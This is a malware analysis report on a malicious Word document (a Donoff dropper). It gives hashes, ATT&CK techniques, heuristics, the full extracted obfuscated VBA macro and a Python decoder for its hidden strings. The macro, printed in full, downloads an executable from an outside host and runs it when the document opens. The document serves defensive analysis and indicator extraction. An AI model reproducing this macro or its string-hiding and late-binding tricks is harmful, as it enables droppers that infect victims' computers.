Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 715de60ab1a1f5b3…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 72.0 KB
Created: 2016-05-09 21:35:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 48ba36e3cfbe839dc7cb9c492599b519
SHA-1: a628bed08aa650a8eaa4a60cc917f40fae85c895
SHA-256: 715de60ab1a1f5b3e25c62e3e2ec07d508b57f6f504828b39a8456013a62841e
Risk score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros with a Document_Open auto-execution entry point. The macro never calls Shell() directly: it creates WScript.Shell, ADODB.Stream and MSXML2.ServerXMLHTTP.6.0 objects through CreateObject() and invokes their members through CallByName, so that method names, the download URL and the drop path only exist at run time. They are assembled by a character-filter routine (qXbpDy.AnzIxa deletes every character of its second argument from its first). Decoding those literals reveals the standard download-and-execute chain: an HTTP GET of http://sascua.com/system/cache/32f32g.exe, the response body written through ADODB.Stream (Type 1, binary) to %TEMP%/d021166baf.exe with SaveToFile, then WScript.Shell.Exec on that file. The ClamAV detection 'Doc.Dropper.Donoff-5743530-0' is consistent with this dropper behaviour.

Heuristics (10)

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim ZwEmILWhS As Integer
    Set aXMDDhm = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xAOSj As Boolean
    Set EiqHnrvc = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim pzxEpuX As Integer, kTRGfWEy As Integer
    YAubrn = CallByName(HMfiOddZ, OJrOKDZc, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim LNbVOO As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI, not an indicator. The macro's real download URL does not appear here because it is assembled at run time from character-filtered string literals and never exists as plain text in the file.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7611 bytes
SHA-256: 49008e87149a9e1d392b9fd6b770f5b81dc84a1a56dee80195755df16fec6721
Detection: ClamAV: No threats found (the Donoff signature matched the OLE container, not the decoded VBA source on its own)
Obfuscation or payload: likely
136 of 214 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim LNbVOO As Boolean
wLteImnF.UFXClS
End Sub
Private Sub MtzgDJZnqP()
RdzCgNLfo "wksVqftGBnLcm", "ECYtgFRZk", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "zIMPiyXg"
Private Sub xZCwW(ByVal DoFeaT As String)
cUAGYTZsVc 1225, 2737, "gB9Agn2nS7kDt"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "7BptBYpVo", "PZT7JNbEGsOnpEv"
End Sub
Public Function uBRMvnuTkN(ByVal DvhBjri As Integer, ByVal rvjkB As String) As String
Dim tlgQiOKqTw As Boolean
uBRMvnuTkN = Mid(rvjkB, DvhBjri, 1)
End Function
Private Sub tAKjkVF(ByVal xXfArtk As String)
yqdpRWtCu
End Sub
Public Function nKKEu(ByVal YYoCUm As String, ByVal flTnd As String, ByVal QGrTXCEOfF As String) As Boolean
Dim mCnUIsoY As String
Dim gZPGFMzJ As String
nKKEu = InStr(1, QGrTXCEOfF, YYoCUm)
End Function

Attribute VB_Name = "qXbpDy"
Public Function AnzIxa(ByVal NkpNAE As String, ByVal fJrdyBG As String) As String
Dim JXAuApxNu As Boolean
Dim TocFs As String, IBGFmd As String
For zKzwrgK = 1 To Len(NkpNAE)
JXAuApxNu = zIMPiyXg.nKKEu(zIMPiyXg.uBRMvnuTkN(zKzwrgK, NkpNAE), AdvIqUmZik, fJrdyBG)
If Not JXAuApxNu Then
XQUKUIlGS = 9746
AnzIxa = AnzIxa & zIMPiyXg.uBRMvnuTkN(zKzwrgK, NkpNAE)
End If
Next
End Function
Private Function AdvIqUmZik() As String
IkmTucyV = "TqaEAGTHtleDree"
AdvIqUmZik = "tSJzLZ6VGuj2eOD"
End Function

Attribute VB_Name = "wLteImnF"
Private Function UcWhJ() As String
qAgGuRAod = 7052
UcWhJ = qXbpDy.AnzIxa("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
Private Sub KIJUR(ByVal AOlwZ As String)
Dim YZaPHJ As Integer
MDpGo = "V9TG4hgAVQoVzsV"
FbWhNy.gRxaIPh True, dVtdbgyQT, NRwvTXQpYs.aXMDDhm, AOlwZ
End Sub
Public Sub UFXClS()
cKAIKaerq = "9CLINLk4BxnR"
zxzkd
End Sub
Private Function vwEoG() As String
vwEoG = "nDvXoVSzB8A6"
End Function
Private Function uJtgJVwOTT() As String
Dim cWkVAU As Integer
uJtgJVwOTT = XJrrHj(qXbpDy.AnzIxa("eTJEoMPe", "eJo")) & zSpEL
End Function
Private Function vxTJFVol() As String
vxTJFVol = qXbpDy.AnzIxa("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
Private Function HYJZIkzk() As String
HYJZIkzk = "GlXmHZ5kRukj"
End Function
Private Sub LspanJIhmp(ByVal saMSPPQRJ As Integer, ByVal rADoUYuuiY As String, ByVal FjvMSIN As String, ByVal QTeBMx As String)
Dim llkVogM As String, ZyPTWCYq As Integer
Set zZZjUJ = NRwvTXQpYs.iGrBgBOZf
zZZjUJ.Open OIIyDN, FjvMSIN, False
FbWhNy.RcVRcMWn zZZjUJ, qXbpDy.AnzIxa("PSeYbndb", "bPY")
QtwMqNWbV False, rADoUYuuiY, "J0H9oKYSPA5lCiM", FbWhNy.YAubrn(zZZjUJ, "ITENZNmX21w", vxTJFVol, 1945)
End Sub
Private Function IuXyvD() As String
IuXyvD = qXbpDy.AnzIxa("CRlAoRsAAe", "ERNA")
End Function
Private Function wjxATzPD() As String
Dim QMviypQfKS As Integer
wjxATzPD = UcWhJ
End Function
Private Sub FbSjPK()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
Private Function zSpEL() As String
Dim RIvSZF As String
Dim IcMvp As Integer
zSpEL = tnqdpEMypZ
End Function
Private Sub zxzkd()
On Error GoTo yWAXXThe
LspanJIhmp 5708, uJtgJVwOTT, wjxATzPD, HYJZIkzk
ieHcrIl = "AftaitYyCx"
KIJUR uJtgJVwOTT
Exit Sub
QIGVmfY = "7g5eHEMzF907jC"
yWAXXThe:
End Sub
Private Function tnqdpEMypZ() As String
IFLCzb = True
tnqdpEMypZ = qXbpDy.AnzIxa("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function dvvnf(ByVal xEiJI As Integer, ByVal dlksibEHV As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
dvvnf = "1D7MzvYfVRv"
End Function
Private Function sdlTSU(ByVal eCPkMeytIw As Boolean) As Boolean
If NACpLN("a5pjwAOdf", "GjjI5Q91FNK9W") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "bv9Vhwjsqp"
SFyHb
sdlTSU = False
End Function
Private Sub EhHmFQ()
aBDhFcyR "vReBrHvcVN", "Ro11IIqiqKX"
End Sub
Private Function OIIyDN() As String
bwVhN = 9168
OIIyDN = qXbpDy.AnzIxa("GHZEjT", "4jZc0H")
End Function
Private Function XSNGAIDfO() As String
XSNGAIDfO = qXbpDy.AnzIxa("wOpWeinw", "wiW")
End Function
Private Function dVtdbgyQT() As String
mVMPpQPeMQ = 3401
dVtdbgyQT = qXbpDy.AnzIxa("jE0xe0jc", "jWh60f")
End Function
Private Sub QtwMqNWbV(ByVal hcBeTJhx As Boolean, ByVal YkGoK As String, ByVal zhAXaq As String, ByVal qhmEeHArgX As Variant)
Dim fWNWnp As String
Set ewmiuE = NRwvTXQpYs.EiqHnrvc
bZfJcN = 978
FbWhNy.bDGDCdkij 654, xbEwL, 1, vwEoG, ewmiuE
FbWhNy.RcVRcMWn ewmiuE, XSNGAIDfO
FbWhNy.gRxaIPh True, qXbpDy.AnzIxa("Wbr3i0OtOe", "b3O0"), ewmiuE, qhmEeHArgX
FbWhNy.BDjTw qXbpDy.AnzIxa("hSaGhverTGhoFGrilGeG", "rhG"), 2, YkGoK, ewmiuE
FbWhNy.RcVRcMWn ewmiuE, IuXyvD
End Sub
Private Function XJrrHj(ByVal umDhOe As String) As String
Set BzLNizsb = FbWhNy.RstBxzgMSw(qXbpDy.AnzIxa("rPrROFCr0ErSFS", "r0F"), qXbpDy.AnzIxa("EWwn vi  ro00n0mwenWtw", "Ww0 "), NRwvTXQpYs.aXMDDhm)
ZcTzOUAO = False
XJrrHj = BzLNizsb(umDhOe)
End Function
Private Function xbEwL() As String
xbEwL = qXbpDy.AnzIxa("TPyPlpe1", "1lmPs")
End Function

Attribute VB_Name = "NRwvTXQpYs"
Public Function EiqHnrvc() As Object
Dim xAOSj As Boolean
Set EiqHnrvc = CreateObject("ADODB.Stream")
End Function
Public Function aXMDDhm() As Object
Dim ZwEmILWhS As Integer
Set aXMDDhm = CreateObject("WScript.Shell")
End Function
Public Function iGrBgBOZf() As Object
Dim qWOWKYxLr As String
Set iGrBgBOZf = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function YAVZkRkG() As Integer
YRcIVIcog
zzTmoaeZe False, "jOuA52b79wv1Qeu"
ngYFxDZeTQ False, 7239, "M22wvI0EctXv5UL"
YAVZkRkG = 7668
End Function

Attribute VB_Name = "FbWhNy"
Public Function YAubrn(ByVal HMfiOddZ As Object, ByVal oTxeZRKXp As String, ByVal OJrOKDZc As String, ByVal wVRBwgDA As Integer) As Variant
Dim pzxEpuX As Integer, kTRGfWEy As Integer
YAubrn = CallByName(HMfiOddZ, OJrOKDZc, 2)
End Function
Public Sub BDjTw(ByVal yYtGYcTBb As String, ByVal yncGXi As Variant, ByVal qAbQMoYZ As Variant, ByVal Spygfkxg As Object)
Dim KmqlTIt As String
CallByName Spygfkxg, yYtGYcTBb, 1, qAbQMoYZ, yncGXi
End Sub
Private Function aGvZEFE() As Boolean
HTXti "Uh7TheWrJT4"
aGvZEFE = False
End Function
Public Function RstBxzgMSw(ByVal HBehUHLc As String, ByVal rSeJlS As String, ByVal wEzxI As Object) As Variant
Dim nXjAA As Boolean
Dim dQXBIPln As Boolean
Set RstBxzgMSw = CallByName(wEzxI, rSeJlS, 2, HBehUHLc)
End Function
Public Sub gRxaIPh(ByVal eadwm As Boolean, ByVal XYIJsDfMSz As String, ByVal gGjZkuA As Object, ByVal sXwdAhxT As Variant)
Dim ITSHjxH As Integer
Dim FHVydPO As Integer
CallByName gGjZkuA, XYIJsDfMSz, 1, sXwdAhxT
End Sub
Private Sub ZFhCa(ByVal vniSMd As Boolean)
NvOKlpusE
aVtapbVnl "yN8cLaNIQMFflAS", 1093, 9096
End Sub
Private Function PlfDY() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "m5Ntfcw5r1gw"
CGgZkEaFBc
PlfDY = 1258
End Function
Public Sub bDGDCdkij(ByVal dFpQXE As Integer, ByVal DbTaqKSka As String, ByVal rMZNRmRIvs As Variant, ByVal rjoKdlKSQP As String, ByVal lPQrwnFcv As Object)
CallByName lPQrwnFcv, DbTaqKSka, 4, rMZNRmRIvs
End Sub
Private Function JjkpMEUt(ByVal YQktM As String) As Boolean
gOZso 1884
JjkpMEUt = True
End Function
Public Sub RcVRcMWn(ByVal SdUaHfol As Object, ByVal sibSUZfw As String)
Dim txZZb As Integer
Dim StzetEcGHa As Integer
kayWGvM = "EbCk4Rx7eMKERnZ"
CallByName SdUaHfol, sibSUZfw, 1
End Sub
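Deobfuscating the strings. The decoder below is an added analyst example, not part of the report tooling or of the sample: it is a Python port of qXbpDy.AnzIxa from the preview above, applied to every literal pair the macro passes to that routine, and it then walks the call chain zxzkd, LspanJIhmp, QtwMqNWbV and KIJUR with the decoded values. The VbCallType numbers (1 = VbMethod, 2 = VbGet, 4 = VbLet) are the ones the FbWhNy wrappers hard-code and are standard VBA; the ADO constants (Type 1 = adTypeBinary, SaveToFile option 2 = adSaveCreateOverWrite) are standard ADODB. The literal "%TEMP%" in the drop path stands for the run-time value of WScript.Shell.Environment("PROCESS")("TEMP"), which is an assumption about the victim host.

```python
"""Added analyst example: Python port of the sample's string decoder qXbpDy.AnzIxa,
applied to every literal pair the extracted macro passes to it. Not part of the
report tooling or the sample."""
from typing import Dict, List, Tuple

# VBA VbCallType values passed as CallByName's third argument by the FbWhNy helpers.
VB_METHOD, VB_GET, VB_LET = 1, 2, 4


def anzixa(s: str, drop: str) -> str:
    """Port of qXbpDy.AnzIxa.

    The VBA loop appends a character of `s` only when nKKEu (InStr on `drop`)
    returns 0, so the routine simply deletes every character occurring in `drop`.
    InStr uses a binary compare by default, so the filter is case-sensitive.
    """
    return "".join(ch for ch in s if ch not in drop)


# (obfuscated literal, filter) pairs copied verbatim from the extracted macro,
# keyed by the function or call site that uses the decoded value.
LITERALS: Dict[str, Tuple[str, str]] = {
    "UcWhJ": ("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1"),
    "OIIyDN": ("GHZEjT", "4jZc0H"),
    "LspanJIhmp/RcVRcMWn": ("PSeYbndb", "bPY"),
    "vxTJFVol": ("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx"),
    "xbEwL": ("TPyPlpe1", "1lmPs"),
    "XSNGAIDfO": ("wOpWeinw", "wiW"),
    "QtwMqNWbV/gRxaIPh": ("Wbr3i0OtOe", "b3O0"),
    "QtwMqNWbV/BDjTw": ("hSaGhverTGhoFGrilGeG", "rhG"),
    "IuXyvD": ("CRlAoRsAAe", "ERNA"),
    "uJtgJVwOTT": ("eTJEoMPe", "eJo"),
    "XJrrHj/arg": ("rPrROFCr0ErSFS", "r0F"),
    "XJrrHj/member": ("EWwn vi  ro00n0mwenWtw", "Ww0 "),
    "tnqdpEMypZ": ("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr"),
    "dVtdbgyQT": ("jE0xe0jc", "jWh60f"),
}


def decode_all() -> Dict[str, str]:
    """Decode every literal pair; keys are the macro's own function / call-site names."""
    return {name: anzixa(s, drop) for name, (s, drop) in LITERALS.items()}


def payload_url() -> str:
    """UcWhJ: the download URL handed to ServerXMLHTTP.Open."""
    return decode_all()["UcWhJ"]


def dropped_path() -> str:
    """uJtgJVwOTT = XJrrHj("TEMP") & zSpEL.

    XJrrHj does CallByName(WScript.Shell, "Environment", VbGet, "PROCESS") and
    indexes the result with "TEMP"; zSpEL supplies the file name. "%TEMP%" is a
    placeholder for that run-time expansion (assumption about the host).
    """
    d = decode_all()
    return "%" + d["uJtgJVwOTT"] + "%" + d["tnqdpEMypZ"]


def reconstruct_chain() -> List[str]:
    """Follow zxzkd -> LspanJIhmp -> QtwMqNWbV -> KIJUR with the decoded strings."""
    d = decode_all()
    url, path = payload_url(), dropped_path()
    return [
        # LspanJIhmp: zZZjUJ.Open OIIyDN, url, False; RcVRcMWn -> CallByName(http, "Send", 1)
        f"MSXML2.ServerXMLHTTP.6.0: .Open '{d['OIIyDN']}', '{url}', False; "
        f".{d['LspanJIhmp/RcVRcMWn']} (CallByName type {VB_METHOD})",
        # YAubrn -> CallByName(http, "ResponseBody", 2)
        f"body = http.{d['vxTJFVol']} (CallByName type {VB_GET})",
        # QtwMqNWbV: bDGDCdkij sets Type = 1 via VbLet; then Open; then Write body
        f"ADODB.Stream: .{d['xbEwL']} = 1 (adTypeBinary, CallByName type {VB_LET}); "
        f".{d['XSNGAIDfO']}; .{d['QtwMqNWbV/gRxaIPh']} body",
        # BDjTw -> CallByName(stream, "SaveToFile", 1, path, 2); RcVRcMWn -> Close
        f"ADODB.Stream: .{d['QtwMqNWbV/BDjTw']} '{path}', 2 (adSaveCreateOverWrite); "
        f".{d['IuXyvD']}",
        # KIJUR: gRxaIPh True, dVtdbgyQT, WScript.Shell, path -> shell.Exec(path)
        f"WScript.Shell: .{d['dVtdbgyQT']} '{path}'",
    ]


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:22} -> {value}")
    print()
    print("\n".join(reconstruct_chain()))
```

The decoded values are the indicators worth recording from this sample: the download URL, the drop file name under %TEMP%, and the late-bound member names (Open/Send/ResponseBody, Type/Open/Write/SaveToFile/Close, Environment and Exec) that the CallByName wrappers hide from string-based scanners. Because the filter is case-sensitive, any port that lower-cases the input first will decode some literals wrongly.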